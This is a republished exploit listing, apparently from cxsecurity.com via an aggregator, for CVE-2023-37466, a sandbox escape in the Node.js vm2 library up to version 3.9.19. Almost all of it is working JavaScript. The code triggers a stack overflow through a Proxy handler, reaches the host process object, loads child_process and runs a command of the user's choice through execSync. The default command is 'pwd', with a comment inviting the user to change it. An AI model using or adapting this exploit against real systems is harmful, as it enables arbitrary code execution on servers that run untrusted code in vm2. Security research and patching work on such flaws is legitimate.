vm2 3.9.19 Sandbox Escape
2024-3-21 00:49:21 Author: cxsecurity.com(查看原文) 阅读量:13 收藏

/* # Exploit Title: vm2 Sandbox Escape vulnerability # Date: 23/12/2023 # Exploit Author: Calil Khalil & Adriel Mc Roberts # Vendor Homepage: https://github.com/patriksimek/vm2 # Software Link: https://github.com/patriksimek/vm2 # Version: vm2 <= 3.9.19 # Tested on: Ubuntu 22.04 # CVE : CVE-2023-37466 */ const { VM } = require("vm2"); const vm = new VM(); const command = 'pwd'; // Change to the desired command const code = ` async function fn() { (function stack() { new Error().stack; stack(); })(); } try { const handler = { getPrototypeOf(target) { (function stack() { new Error().stack; stack(); })(); } }; const proxiedErr = new Proxy({}, handler); throw proxiedErr; } catch ({ constructor: c }) { const childProcess = c.constructor('return process')().mainModule.require('child_process'); childProcess.execSync('${command}'); } `; console.log(vm.run(code));



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2024030048
如有侵权请联系:admin#unsafe.sh